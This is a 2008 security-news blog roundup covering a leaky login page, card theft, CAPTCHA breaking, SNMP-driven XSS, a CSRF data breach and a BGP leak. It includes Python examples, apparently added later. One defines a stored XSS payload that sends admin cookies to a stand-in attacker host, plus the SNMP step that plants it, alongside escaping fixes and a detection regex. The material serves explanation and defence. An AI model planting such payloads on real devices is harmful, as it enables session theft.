Friday, February 29, 2008

How Not to Secure Your Login Site

Via DailyWTF -

Not too long ago, I added my company, Inedo, to the federal government's Central Contractor Registration system. I don't know, I just didn't want to miss out on all the fun everyone seems to have with government work. Whenever one signs up for virtually any government thing, a deluge of companies somehow manage to find out. The CCR is certainly no exception.

One of the many companies that contacted me after signing up was the Federal Suppliers Guide. The initial cold call went something like this:

FSG Rep: Hi Alex, I've got some great news for you!

(Let me guess... you can save me a lot of money on something...)
Me: Okay...

FSG Rep: We've reviewed your CCR registration, and it looks like your company could be eligible for placement in our guide!

(Wow, that *is* great news!)
Me: Your guide?

FSG Rep: The Suppliers Guide! It's used *exclusively* by state and federal agencies to purchase services and products. Anyway, to confirm your eligibility, I'll need to ask a few questions. First, where are you located?

--- snipped a total of three questions asked ---

FSG Rep: Okay... well, let me punch this in here -- clickity clickity clicky -- wow! This is really good! You are, in fact, eligible for the guide! Would you like to be in our guide?

(There's no possible way there could be any sort of catch here...)
Me: Sure! Why not?

FSG Rep: Fantastic! There's just a nominal fee to get started, so if you'll just get me your credit card number we can--

Me: How much is the nominal fee?

FSG Rep: Heh, it's really very little actually. It's a fantastic investment that ranges anywhere from six hundred to several thousand.

Me: I can't make that decision right now; can you send me over some information?

FSG Rep: Oh. You can't? Well, I mean, I guess I could send you more information... but you know, I can just answer any questions you have now. I mean, I'd hate for you to lose your eligibility, that's all!

(What a nice guy! And this whole time, I thought he was a fast-talking salesman...)
Me: I guess we'll just have to take that risk; can you also send me a copy the guide, too?

FSG Rep: Err, gee... well, you know... that's the one thing I can't do. You see, these guides are to be used *exclusively* by government agents. We can't just give them to anyone, you know.

(And to think, I was questioning whether they were even legitimate!)
Me: Okaaaay... just send me what you can then.

After a bit more back-and-forth about how he could "just answer any questions I had right now", the sales rep pointed me to their sample ads, a 7mb PDF with sixteen pages of seemingly real companies, all with the same phone number (555-555-5555) and the same website ( Somehow, that didn't convince me to "invest" several hundred dollars, so the salesman faxed over some more information with a single, real ad.

As I eagerly waited for the follow-up call later that day, I thought I'd take a minute or two to check out their website. Almost immediately, I came across their Federal Procurement Officers Only page. Out of curiosity, I entered a username and password, and then clicked the Login button. Instantly, a JavaScript dialog popped-up...


What happens after that? You will have to check the DailyWTF post linked above... or look at the site yourself (hint: look at the HTML source code).

Of course, it would not be wise to use login information that is basically handed out like this. The story is blowing up, and accessing a system without authorization could get you in legal trouble.

Thursday, February 28, 2008

Malware Removes Rival Rootkits

Via The Channel Register -

Miscreants have created a strain of malware capable of removing rootkits from compromised PCs, only to install almost undetectable backdoor code of its own.

The Pandex Trojan stops previously installed rootkits from working by removing their hooks into system calls. Pandex then installs its own rootkit component, detected by Trend Micro as Pushu-AC.

Diebold Accidentally Leaks Results Of 2008 Election Early

Via The Onion -

Diebold Accidentally Leaks Results Of 2008 Election Early

HSBC Confirms Customer Card Data Was Stolen

Via -

HSBC confirmed that thieves stole card payment data from the bank and they were reissuing 6,000 atm/debit cards to customers affected by the breach. One Consumerist reader, Keith, had $2000 stolen from him via an ATM in Bulgaria, and another, Emily, had $2,800 siphoned from her account from ATMs located clear across the country. (Emily also got interviewed on WCBS and we got a mention and a screenshot). Checking the comments section, it looks like 11 other Consumerist readers were affected by the HSBC fraud as well, with a number of the fraudulent withdrawals being made from Montreal and Canada. Sounds like the thieves stole the data, which contained both card numbers and PIN codes, and then cloned ATM/debit cards. If you're an HSBC customer, might be a good time to change your PIN number.

Professor Faces 180 Lashes for Having Coffee With Student

Via Fox News -

A university professor allegedly caught in a Saudi-style honey trap has been sentenced to 180 lashes and eight months in jail — for having coffee with a girl.

The man, a prominent and well-respected Saudi teacher of psychology at Umm al-Qra University in the holy city of Mecca, was framed by the religious police after he angered some of their members at a training course, his lawyer said.

The academic has not been named by the local media, which have given his case wide coverage, but one senior Saudi journalist told The Times he was Dr. Abu Ruzaiz, a married man in his late 50s with children.

“He is highly respected and above-board. Nobody believes the religious police’s version of what happened. The whole of Jeddah (the main city near Mecca) is in uproar about this. Everyone believes he is innocent and was set up,” the journalist said.

Contact between unrelated men and women is strictly prohibited in the desert kingdom where religious police, commonly known as mutaween, patrol public places in teams to enforce their brand of ultra-conservative Islam.

Usually bearded and often wielding canes, they ensure women are not harassed, sexes do not mix and shops close for prayers. They are under the command of the Saudi Commission for Promotion of Virtue and Prevention of Vice.

Abdullah Al-Sanousi, the academic’s lawyer, told local newspapers that his client had drawn the ire of some of the Commission’s staffers for speaking at length during a training session about how important it was for them to be polite to the public. Some of the trainees also wanted revenge because they had failed the course while others were not happy with their examination results.

Ruzaiz is said to have received a call from a girl purporting to be one of his students who asked to meet to discuss a problem that she did not want to talk about over the phone. The professor agreed to meet at a family cafe, provided she brought her brother along as a chaperone.

When he arrived, he was surprised to find the girl alone, and was promptly surrounded by religious policemen who handcuffed him and hauled him into custody. He was accused of being in a state of khulwa — seclusion — with an unrelated woman.

Nanotechnology-based Clean Hydrogen for Cars

Via ZDNet -

According to EE Times, a California-based company called QuantumSphere has developed nanoparticles that could make hydrogen cheaper than gasoline. The company says its reactive catalytic nanoparticle coatings can boost the efficiency of electrolysis (the technique that generates hydrogen from water) to 85% today, exceeding the Department of Energy’s goal for 2010 by 10%. The company says its process could be improved to reach an efficiency of 96% in a few years. The most interesting part of the story is that the existing gas stations would not need to be modified to distribute hydrogen. With these nanoparticle coatings, car owners could to make their own hydrogen, either in their garage or even when driving.

Here is the business plan of QuantumSphere according to EE Times. “QuantumSphere’s plan is first to retrofit existing electrolysis equipment with its nanoparticle electrodes to boost efficiency. Next, it intends to partner with original equipment manufacturers to design at-home and on-vehicle electrolysers for making hydrogen from water for fuel cells. Finally, the company wants to work with fuel cell makers to replace their expensive platinum electrodes with inexpensive stainless-steel electrodes coated with nickel-iron nanoparticles.” The question is: will this plan work?

Now, let’s move to technical details. “The nanoparticles are perfect spheres, consisting of a couple hundred atoms measuring from 16 to 25 nanometers in diameter. They are formed by means of a vacuum-deposition process that uses vapor condensation to produce highly reactive catalytic nanoparticles, for which the engineering team has formulated several end-use applications. ‘Our biggest engineering challenge was finding a way to get the nanoparticles to stick to metal electrodes,’ McGrath said. The company has solved that problem, she said, ‘enabling existing electrolysis equipment to realize a 30 percent increase in hydrogen output just by retrofitting our coated electrodes.’”

Liberty Hill ISD Dumps Personal Data in Trash Bin

Via (Local Austin) -

Parents give schools lots of personal and private information about their children. They expect they will keep that information safe and secure and away from prying eyes. But that's not the case for one local school district.

Lots of confidential files were left out in a bin in the district's parking lot.

CBS 42 Investigative Reporter Nanci Wilson shows just how easy it was to walk off with boxes of students' and employees' personal information.


Check out the video for more details.

I just love to see female news reporters in business pant suits digging around in the trash...dumpster diving, business class style.

Cyberspace as a Combat Zone: The Phenomenon of Electronic Jihad

Alongside military jihad, which has been gaining momentum and extracting an ever growing price from many countries around the globe, Islamists have been developing a new form of warfare, termed "electronic jihad," which is waged on the Internet. This new form of jihad was launched in recent years and is still in its early stages of development. However, as this paper will show, Islamists are fully aware of its destructive potential, and persistently strive to realize this potential.

Egypt Bans Human Rights Booklets Distributed In Schools

Via The MEMRI Blog -

Local authorities in Upper Egypt have banned the distribution of educational booklets advocating human rights, stating that they pose a threat to state security.

The booklets were distributed to pupils in Egyptian schools as part of a U.S.-funded initiative implemented by the Arab Organization for Reform.

Source: Al-Mustaqbal, Lebanon, February 27, 2008

A1one in Tehran

This is A1one (Tanha), from Tehran, IRAN. Maybe I am a Vandal or Anarchist. But I am glad to introduce myself as one. At least I stand for my right. I am not about politics. But I am interested in social subjects. I express through Graffiti, wall painting, stencil spray, wheatpastes and Stickers in streets of Tehran and other places.


I found A1one by way of the Arab Culture Blog over at MEMRI.

Also, check the Iranian Underground Art Movement website.

Wednesday, February 27, 2008

National Collegiate Cyber Defense Competition 2008

2007 NCCDC Results

Congratulations to Texas A&M on winning the second National Collegiate Cyber Defense competition. We would like to take a moment to thank all of the teams who participated for making this a great experience. The professionalism and the manner in which each team conducted themselves throughout the weekend could not have been any better. The race was tight throughout the weekend and each team and the institutions they represented should be extremely proud of their efforts. A complete list of competitors and the final standings can be found here.

We would also like to thank the Department of Homeland Security for their continued support of the competition. DHS also made the announcement that they will be sponsoring the winning team to attend and participate in Cyberstorm II. Having taken part in the last Cyberstorm, we know what a great opportunity this is for Texas A&M and look forward to hearing about their experiences.

All of our white and red team volunteers and our sponsors deserve special recognition as well. These competitions are very difficult and costly to put together and without the overwhelming support we receive from the community and industry this competition, as well as the regional competitions, would not be possible.


2008 National Collegiate Cyber Defense Competition
April 18th - 20th 2008
San Antonio, TX


I love the sponsors.

O'Reilly, Pizza Hut, ThinkGeek & Pepsi - now that is one hell of a hacker LAN party. ;)

CO2-Absorbing Crystals Just the Tip of Iceberg for UCLA Lab

Via -

LOS ANGELES -- Researchers at UCLA made headlines this month by developing a nanoscale crystal that traps roughly 80 times its volume of carbon dioxide. This particular crystal has excited proponents of carbon-capture technology for its ability to absorb CO2 and nothing else, but the process that head researcher Omar Yahgi and his lab used to develop the compound is potentially much more significant.

Yahgi’s lab employs automation techniques frequently found in the biotech and pharmaceutical industry to rapidly test crystal samples on a scale not previously possible, which has led to an avalanche of new discoveries. At one point, the technique was yielding so many potentially useful compounds that Yahgi had to ask his students to stop so they could publish their findings. Possible uses for crystals that can selectively absorb specific molecules are numerous, including military applications and hydrogen-fuel storage for green vehicles.

Foreign Hacker Targeting U.S. Health Care Records

Via CNET -

According to a recent article in Federal Computer Week, foreign criminal hackers are targeting American health records.

Mark Walker of DHS Critical Infrastructure Protection Division recently told a National Institute of Standards and Technology workshop that the hackers' primary motive seems to be espionage. For example, any health problems among the nation's leaders would be of interest to potential enemies, he said.

Walker cited two events from 2007. In one, a virus was placed on the Centers for Disease Control and Prevention Web site. In another, there was a known data breach in the Tricare records for the Military Health System.

The Department of Homeland Security wants to build a database of health care-related data breaches. At present, Walker told the workshop that the DHS only has a vague understanding of data loss connected with health care services.

Killer Robots Pose Latest Militant Threat

Via -

LONDON (Reuters) - Killer robots could become the weapon of choice for militants, a British expert said on Wednesday.

Noel Sharkey, professor of artificial intelligence and robotics at the University of Sheffield said he believed falling costs would soon make robots a realistic option for extremist groups.

Several countries and companies are developing the technology for robot weapons, with the U.S. Department of Defense leading the way. More than 4,000 robots are deployed in Iraq.

"The trouble is that we can't really put the genie back in the bottle. Once the new weapons are out there, they will be fairly easy to copy," Sharkey will tell a one-day conference organized by Britain's Royal United Services Institute on Wednesday.

"How long is it going to be before the terrorists get in on the act? With the current prices of robot construction falling dramatically and the availability of ready-made components for the amateur market, it wouldn't require a lot of skill to make autonomous robot weapons."

Sharkey said a small GPS-guided drone with autopilot could be made for about 250 pounds ($490).

Tuesday, February 26, 2008

Using SNMP to Stage XSS Attacks

Via DarkReading -

It’s yet another new spin on a pervasive attack -- this time using the old standby Simple Network Management Protocol (SNMP) to stage cross-site scripting (XSS) attacks.

XSS, which basically forces a Website to echo malicious code that then gets loaded into a user's browser, is one of the most common vulnerabilities in Web applications. Researchers with ProCheckUp Ltd. recently discovered what they think may be a new type of attack vector, using SNMP to create a “persistent XSS” attack. Persistent XSS is a more powerful XSS attack where malicious code is stored on a Website for a period of time, and all the user has to do is view the page to get infected.

With SNMP, the attacker changes parameters in the device to then launch a persistent XSS attack. ProCheckUp found the SNMP-XSS vulnerability, as well as several others, while researching ZyXEL’s Prestige gateway products, which are commonly used in home, SOHO, and ISP networks.

“A persistent XSS attack is launched when the parameters containing the payload are printed on the browser via the web interface of the device,” writes Adrian Pastor, a security consultant with ProCheckUp, in a report. The problem lies in part with the fact that ZyXEL’s Prestige products run with SNMP, HTTP, and telnet in default mode on its WAN interface, Pastor says. “This is at least true among the ISPs used by some of our customers who we offer penetration testing services for,” he writes.

XSS expert RSnake -- aka Robert Hansen, CEO of SecTheory -- says using SNMP to launch an XSS attack is definitely an interesting approach. “It's hard to say that it's new since lots of exploits use logging variables to instantiate the XSS attack, but that's definitely the first time I've heard SNMP [being] used."

RSnake says SNMP and Web application hackers don’t typically intersect, so the attack method is an interesting mix: "Lots of hackers use SNMPwalk, but not many Web app hackers."
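The mechanism in the ProCheckUp write-up is simple to model: any SNMP-writable string that the device's web UI later prints becomes a stored payload. The following is an added example, not ProCheckUp's or ZyXEL's code; it uses the standard MIB-II system group OIDs (sysContact, sysName, sysLocation), a constructed write community string, a constructed status page layout and a constructed payload. It shows the one SET that plants the payload, the vulnerable rendering beside the escaped one, and a defender-side check you can run over snmpwalk output.

```python
"""Persistent XSS through an SNMP-writable string: constructed illustration.

Added example code, not from the article or the vendor. A toy gateway stores
MIB-II system strings and prints them into an HTML status page; one SNMP SET
plants a payload that every later admin page view executes. Community string,
OID choice, page layout and payload are assumptions.
"""
import html
import re
from dataclasses import dataclass, field

# MIB-II system group scalars (standard OIDs); commonly writable with the
# write community string.
SYS_CONTACT = "1.3.6.1.2.1.1.4.0"
SYS_NAME = "1.3.6.1.2.1.1.5.0"
SYS_LOCATION = "1.3.6.1.2.1.1.6.0"

# Constructed payload: leaks the admin's session cookie to an attacker host.
PAYLOAD = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"


def default_mib():
    return {SYS_CONTACT: "noc@example.net", SYS_NAME: "gw-1", SYS_LOCATION: "rack 3"}


def _esc(s):
    return html.escape(s, quote=True)


@dataclass
class Device:
    """Toy gateway exposing SNMP and an HTTP status page on the same interface."""
    write_community: str
    mib: dict = field(default_factory=default_mib)

    def snmp_set(self, community, oid, value):
        """SNMPv1/v2c SET: the community string is the only 'authentication'."""
        if community != self.write_community or oid not in self.mib:
            return False
        self.mib[oid] = value
        return True

    def status_page_vulnerable(self):
        """Echoes MIB strings into the page unescaped (the bug class in the article)."""
        return ("<h1>{}</h1><p>Contact: {}</p><p>Location: {}</p>"
                .format(self.mib[SYS_NAME], self.mib[SYS_CONTACT], self.mib[SYS_LOCATION]))

    def status_page_fixed(self):
        """Same page, but every SNMP-sourced string is HTML-escaped at output time."""
        return ("<h1>{}</h1><p>Contact: {}</p><p>Location: {}</p>"
                .format(_esc(self.mib[SYS_NAME]), _esc(self.mib[SYS_CONTACT]),
                        _esc(self.mib[SYS_LOCATION])))


def plant_payload(device, community, oid=SYS_LOCATION):
    """Attacker step: a single SNMP SET from the WAN side. Returns whether it landed."""
    return device.snmp_set(community, oid, PAYLOAD)


def payload_rendered(device):
    """Does the stored payload come back as live markup? -> (vulnerable, fixed)."""
    return (PAYLOAD in device.status_page_vulnerable(),
            PAYLOAD in device.status_page_fixed())


# Defender-side check for snmpwalk output: system strings should never contain
# markup. Flags anything that looks like a tag, a javascript: URL or an event handler.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|javascript:|on[a-z]+\s*=", re.IGNORECASE)


def suspicious_mib_values(mib):
    """Return the OIDs whose string value looks like injected markup."""
    return sorted(oid for oid, value in mib.items() if SUSPICIOUS.search(value))
```

Two things to take from this: escaping has to happen at the point where the value is written into HTML, because the "input validation" boundary here is SNMP, not a web form; and the SET itself is the only precondition, so a writable community string reachable on the WAN interface is the real finding.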

Hacker Steals Data on 18M Customers in South Korea Using CSRF

Via DarkReading -

South Korea’s largest online shopping site earlier this month was attacked by a Chinese hacker who made off with the user information on 18 million members and a large amount of financial data.

According to reports on Hack in the Box and the Web Application Security Consortium Incident Report, has disclosed the theft of data from some 18 million buyers and sellers.
The attack was launched from China's internet. After the incident, received a phone call offering to exchange the user information for money, the reports said.

According to a report on Dark Visitor, a security blog site, the Chinese hacker did not directly attack the server. The hacker sent out bulk emailings to the auction staff containing “hacker procedures" that may have contained malware. When the staff members confirmed the emails, the hacker was able to gain their IDs. The hacker was then able to log into the Auction server using the staffer’s ID.

The WASC report categorizes the exploit as a cross-site request forgery attack. "The attack description is vague, but can be best described as session hijacking," the organization said. waited 20 hours after the attack before confirming the loss of information, according to the Korean site Korean users rebuked the Website for being too slow to act, the reports said.


Are PMs and programmers trying to tell you that CSRF isn't a big deal??

Well, here is your ammo...
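Since the report's own description is vague, here is the shape of the thing in code. This is an added example, not anything from the incident or from WASC: a staff-only export endpoint that authorizes on the session cookie alone, beside the same endpoint protected by a session-bound synchronizer token. The session store, token derivation, endpoint name and form fields are all constructed for illustration.

```python
"""CSRF against a logged-in staff session: cookie-only authorization vs. a
session-bound token. Added example code; endpoint, session store and token
scheme are constructed for illustration.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Server-side key for deriving tokens; generated at process start (assumption).
SECRET_KEY = secrets.token_bytes(32)

# session id -> session data (a real app would use a server-side store).
SESSIONS = {}


@dataclass
class Request:
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def login(user):
    """Create a session and return the cookie value the browser will replay."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user}
    return sid


def csrf_token(sid):
    """Synchronizer token bound to the session: HMAC(key, session id).
    Unforgeable without the key, and only pages on our origin can read it."""
    return hmac.new(SECRET_KEY, sid.encode(), hashlib.sha256).hexdigest()


def export_users_vulnerable(req):
    """Authorizes on the session cookie alone. Any page the staffer visits can
    make the browser submit this form with the cookie attached."""
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return 401, "login required"
    return 200, f"{sess['user']} exported {req.form.get('count')} records"


def export_users_fixed(req):
    """Same endpoint, but the form must carry a token only our own pages could
    have obtained. A forged cross-site request has the cookie but not the token."""
    sid = req.cookies.get("sid")
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401, "login required"
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token(sid).encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"{sess['user']} exported {req.form.get('count')} records"


def forged_request(sid):
    """What an attacker-controlled page produces: the victim's browser adds the
    cookie, the attacker controls only the form fields."""
    return Request(cookies={"sid": sid}, form={"count": "18000000"})


def legitimate_request(sid):
    """Our own page embeds the token in the form it renders for this session."""
    return Request(cookies={"sid": sid},
                   form={"count": "10", "csrf_token": csrf_token(sid)})
```

The point for the PM conversation: the vulnerable handler is "correct" by every test that only checks login state, because the forged request really is authenticated. Possession of the staffer's live session is the whole attack, which is why a report can plausibly call it either CSRF or session hijacking.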

Hackers Poised To Beat Apple's Latest Version Of DRM

Via InformationWeek -

One of the hotter memes over the weekend had to do with a cease and desist letter that the ever-litigious Apple sent to the operators of the Hymn Project. For those looking to remove Apple's copy protection technology (officially "FairPlay," but I call it "C.R.A.P.") from iTunes Music Store (iTMS)-bought content, the Hymn Project has been the go-to site for utilities that have managed to stay one step ahead of Apple in what has been a cat and mouse game.

That cat n' mouse game has traditionally involved the companies (Apple, Microsoft (NSDQ: MSFT), etc.) whose copy protection or Digital Rights Management (DRM) technologies are theoretically designed to protect the rights of rights-holders (eg: the record labels) versus the consumers of that content, many of whom believe their own rights are being trampled in the course of trying to protect the rights of the aforementioned rights holders. Not helping matters are a smaller but prolific group of content pirates who have no rights at all to the content in question (in other words, they've never made a purchase), but who have played a significant role in the illegal proliferation of unauthorized and unlicensed content through file-sharing networks.

Despite trying, neither Apple nor Microsoft (the two main purveyors of DRM technology) have been able to keep outfits like the Hymn Project from defeating their latest technical measures designed to put an end to the cat n' mouse game.

One question that remains largely unanswered is "Why did Apple wait so long to use its legal options against the Hymn Project?" Over the weekend, several DRM and Apple-watchers speculated that the latest hack made available through the Hymn Project (known as "Requiem") pushed Apple over the edge because of the decryption techniques it used -- techniques that may have put Apple at a far more serious disadvantage in that cat n' mouse game that it has ever been.

Corn Genome Fully Mapped

Via -

WASHINGTON, Feb 26 (Reuters) - Researchers have sequenced the gene map of corn, also known as maize, a key crop across much of the world and a source of food, oil and products ranging from shoe polish to ethanol.

They said their sequence, to be released at a meeting in Washington on Thursday, would help plant scientists improve varieties of corn and other cereal crops, including rice, wheat and barley.

"Scientists now will be able to accurately and efficiently probe the corn genome to find ways to improve breeding and subsequently increase crop yields and resistance to drought and disease," Richard Wilson of Washington University in St. Louis, whose team led the effort, said in a statement.

The effort to sequence the entire gene map of corn has cost $29.5 million, funded by the National Science Foundation, the U.S. Department of Agriculture and the U.S. Department of Energy.

Pakistan Lifts Curbs on YouTube

Via AP -

ISLAMABAD, Pakistan (AP) — Pakistan's telecoms regulator said Tuesday it has lifted restrictions on the YouTube Web site that led to the knocking out of access to the popular video-sharing site in many other countries for a few hours over the weekend.

The Pakistan Telecommunication Authority ordered 70 domestic Internet service providers to restore access to the site after removal of what government officials had deemed a "blasphemous" video clip.

Pakistan ordered YouTube blocked on Friday over a clip featuring a Dutch lawmaker who has said he plans to release a movie portraying Islam as fascist and prone to inciting violence. As a result, most of the world's Internet users lost access to YouTube for several hours on Sunday.

An Internet expert said Sunday's problems came after a Pakistani telecommunications company complied with the block by directing requests for YouTube videos to a "black hole." So instead of serving up videos of skateboarding dogs, it sent the traffic into oblivion.

The problem was that the company also accidentally identified itself to Internet computers as the world's fastest route to YouTube, which is owned by Google Inc. That led requests from across the Internet to the black hole.

The outage highlighted yet another of the Internet's vulnerabilities, coming less than a month after broken fiber-optic cables in the Mediterranean took Egypt off line and caused communications problems from the Middle East to India.
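The AP's "world's fastest route" is the lay version of how BGP picks a path: the most specific matching prefix wins before any other attribute is considered, and it wins at every router that accepts the announcement. The following is an added example, not from the article or any operator. It assumes the leaked route was a more-specific prefix, which the article does not state, and uses RFC 5737 documentation space rather than the real prefixes. It shows longest-prefix selection, what the leak does to traffic, and the kind of origin/prefix-length filter an upstream should have applied to the announcement.

```python
"""Longest-prefix match and a black-holed announcement: constructed illustration.

Added example code, not from the AP article or any ISP. BGP installs the most
specific matching prefix regardless of who announced it, so a mis-propagated
announcement more specific than the legitimate one captures that traffic
everywhere it is accepted. That the 2008 event involved a more-specific prefix
is an assumption here; the prefixes below are documentation space, not the real ones.
"""
import ipaddress

BLACK_HOLE = "discard"


def select_route(table, dst):
    """Return the next hop for dst using longest-prefix match, or None."""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, nexthop in table.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, nexthop)
    return None if best is None else best[1]


def legitimate_table():
    """The video site's own announcement (constructed)."""
    return {"203.0.113.0/24": "AS64500 (video site)"}


def with_leaked_announcement(table):
    """The blocking ISP's internal null route, a more-specific /25, leaks to its
    upstream and from there to everyone. Hosts in that /25 now route to discard."""
    leaked = dict(table)
    leaked["203.0.113.0/25"] = BLACK_HOLE
    return leaked


def affected_hosts(table, hosts):
    """Which destinations end up in the black hole under this routing table."""
    return [h for h in hosts if select_route(table, h) == BLACK_HOLE]


# What the upstream should have enforced: per-origin list of announceable
# prefixes with a maximum length, in the spirit of an IRR route object or ROA
# (constructed data).
AUTHORIZED = {"AS64500": [("203.0.113.0/24", 24)]}


def accept_announcement(origin_as, prefix, authorized=AUTHORIZED):
    """Accept only if the prefix lies inside one the origin is authorized for
    and is no more specific than that entry's maximum length."""
    net = ipaddress.ip_network(prefix)
    for allowed, maxlen in authorized.get(origin_as, []):
        if net.subnet_of(ipaddress.ip_network(allowed)) and net.prefixlen <= maxlen:
            return True
    return False
```

Note that the filter rejects the leak on two independent grounds: the announcing ISP is not an authorized origin for the block at all, and a /25 is more specific than the owner's own maximum length. Either check alone would have kept the route out of the upstream's table.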

Monday, February 25, 2008

Scotland Yard Careers Website Defaced

Via The Register -

Unknown hackers defaced the Metropolitan Police's careers website over the weekend.

Digital graffiti on featured a picture of a greenish cuddly monster (vaguely resembling Sulley from Monsters Inc) and a message mocking Scotland Yard's anti-terrorism unit.

The offending message has since been purged from the site. The digital graffiti attack is of little importance, but no less embarrassing for Scotland Yard.

Netcraft reports that the site runs on a Windows 2000 platform.

Spammers Crack Gmail Captcha

Via The Register -

Spammers, fresh from the success of cracking the Windows Live captcha used by Hotmail, have broken the equivalent system at Gmail.

Internet security firm Websense reports that miscreants have created bots which are capable of signing up and creating random Gmail accounts for spamming purposes, defeating Captcha-based defences in the process. It reckons the same group of spammers are behind both attacks.

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) challenge-response systems, which are used to prevent accounts being created until a user correctly identifies letters in an image, are designed to ensure requests are made by a human rather than an automated program. The technique has been used to defeat automatic sign-ups to email accounts by services including Yahoo! Mail and Gmail for years, and hackers are increasingly successful in defeating the approach. For example, the HotLan Trojan has created more than 500,000 spam email accounts with Hotmail, Yahoo! and Gmail since its arrival back in July 2007.

Websense reckons the latest Gmail Captcha hack is the most sophisticated it has seen to date. Unlike Live Mail Captcha breaking, which involved just one zombie host doing the entire job, the Gmail breaking process involves two compromised hosts. Each of the two compromised hosts applies a slightly different technique to analysing Captcha, as explained in a posting by Websense.

Even using the two techniques, only one in every five Captcha-breaking requests are successful. It's a fairly low percentage, but one that's still more than workable in the case of automated attacks.

It sounds like a lot of effort, but gaining a working Gmail account has a number of advantages for spammers. As well as gaining access to Google's services in general, spammers gain a address whose domain is highly unlikely to be blacklisted, helping them defeat one aspect of anti-spam defences. Gmail also has the benefit of being free to use.

Guide to the Secure Configuration of Red Hat Enterprise Linux 5

Full Guide

Hardening Cheat Sheet

  • Do not attempt to implement any of the recommendations in this guide without first testing in a non-production environment.
  • This document is only a guide containing recommended security settings. It is not meant to replace well-structured policy or sound judgment. Furthermore this guide does not address site-specific configuration concerns. Care must be taken when implementing this guide to address local operational and policy concerns.
  • The security changes described in this document apply only to Red Hat Enterprise Linux 5. They may or may not translate gracefully to other operating systems.
  • Internet addresses referenced were valid as of 1 July 2007.


Don't be silly and follow this guide line by line. It has tons of great security tips in it, but it is made for the US Government...not for Bob's pizza joint.

Use common sense and apply security measures where they make sense. Some of the "recommended" tips in these guides are not healthy for a corporate bottom-line.

Use the force and find the balance.


With that being said, I was able to also use several of the tips in securing my CentOS VM image that I use for security testing.

Critical VMware Shared Folders Vuln Still Open

Via Computerworld -

A critical vulnerability in VMware Inc.'s virtualization software for Windows lets attackers escape the "guest" operating system and modify or add files to the underlying "host" operating system, the company has acknowledged.

As of Sunday, there was no patch available for the flaw, which affects VMware's Windows client virtualization programs, including Workstation, Player and ACE. The company's virtual machine software for Windows servers and for Mac- and Linux-based hosts are not at risk.

The bug was reported by Core Security Technologies, makers of the penetration-testing framework CORE IMPACT, said VMware in a security alert issued last Friday. "Exploitation of this vulnerability allows attackers to break out of an isolated guest system to compromise the underlying host system that controls it," claimed Core Security.

According to VMware, the bug is in the shared-folder feature of its Windows client-based virtualization software. Shared folders let users access certain files -- typically documents and other application-generated files -- from the host operating system and any virtual machine on that physical system.

"On Windows hosts, if you have configured a VMware host-to-guest shared folder, it is possible for a program running in the guest to gain access to the host's complete file system and create or modify executable files in sensitive locations," confirmed VMware.

VMware has not posted a fix, but it instead told users to disable shared folders.


Details on the exact nature of the vulnerability can be found over at

Sunday, February 24, 2008

Svalbard Global Seed Vault - Feb 26 Inauguration

Via -

Aimed at providing mankind with a Noah's Ark of food in the event of a global catastrophe, an Arctic "doomsday vault" filled with samples of the world's most important seeds will be inaugurated here Tuesday.

European Commission President Jose Manuel Barroso and Nobel Peace Prize winning environmentalist Wangari Matai will be among the personalities present at the inauguration of the vault, which has been carved into the permafrost of a remote Arctic mountain, just some 1,000 kilometres (620 miles) from the North Pole.

The vault, made up of three spacious cold chambers each measuring 27 x 10 metres (89 x 33 feet), creates a long trident-shaped tunnel bored into the sandstone and limestone.

It has the capacity to hold up to 4.5 million batches of seeds from all known varieties of the planet's main food crops, making it possible to re-establish plants if they disappear from their natural environment or are obliterated by major disasters.

"The facility is built to hold twice as many varieties of agricultural crops as we think exist," explained Cary Fowler, executive director of the Global Crop Diversity Trust and project mastermind.

"It will not be filled up in my lifetime, nor in my grandchildren's lifetime," he predicted in a phone interview with AFP.

Norway has assumed the six million euro (8.9 million dollar) charge for building the vault in its Arctic archipelago of Svalbard, where ironically no crops grow.

Secured behind an airlock door, the three airtight chambers have the capacity to house duplicates of samples from all the world's more than 1,400 existing seed banks.

Many of the more vulnerable seed banks have begun contributing to the "doomsday vault" collection, but some of the world's biodiversity has already disappeared, with gene vaults in both Iraq and Afghanistan destroyed by war and a seed bank in the Philippines annihilated by a typhoon.

By the time of the inauguration on Tuesday, the Svalbard Global Seed Vault should hold some 250,000 samples, which will remain the property of their countries of origin.

Pakistan and Kenya, both undergoing periods of serious unrest, have sent seed collections, while samples sent from Colombia have been closely scrutinised by police to avoid the project becoming a vehicle for drug trafficking.

"I've been working in this field for 30 years and I thought I knew at least all the crops," Fowler said.

After receiving a list of all the different seeds in the vault, however, "I must admit there are a number of crops I've never heard of before," he said.

Google Mounts Chewbacca Defense in EU Privacy Debate

Via The Register -

Over at The Official Google Rhetoric Blog, the world's largest search engine continues to muddle the debate over the privacy of IP addresses.

As the European Union questions whether IP addresses should be considered "personal data" - "personally identifiable information" in American parlance - Google software engineer Alma Whitten brings up the issue and then spends several paragraphs failing to address it.

With her blog post, Whitten points out that "the IP addresses that people use can change frequently":

For instance, your Internet service provider (ISP) may have a block of 20,000 IP addresses and 40,000 customers. Since not everyone is connected at the same time, the ISP assigns a different IP address to each computer that connects, and reassigns it when they disconnect (the actual system is a bit more complex, but this is representative of how it works). Most ISPs and businesses use a variation of this "dynamic" type of assigning IP addresses, for the simple reason that it allows them to optimize their resources.

Because of this, the IP address assigned to your computer one day may get assigned to several other computers before a week has passed. If you, like me, have a laptop that you use at work, at home, and at your corner café, you are changing IP addresses constantly. And if you share your computer or even just your connection to your ISP with your family, then multiple people are sharing one IP address.

Yes, it's all true. Your IP address can change. And sometimes, you share an IP address with others. But the same goes for phone numbers.

Sure, you can say that sometimes IP addresses don't map back to particular individuals. But this also means that sometimes they do.

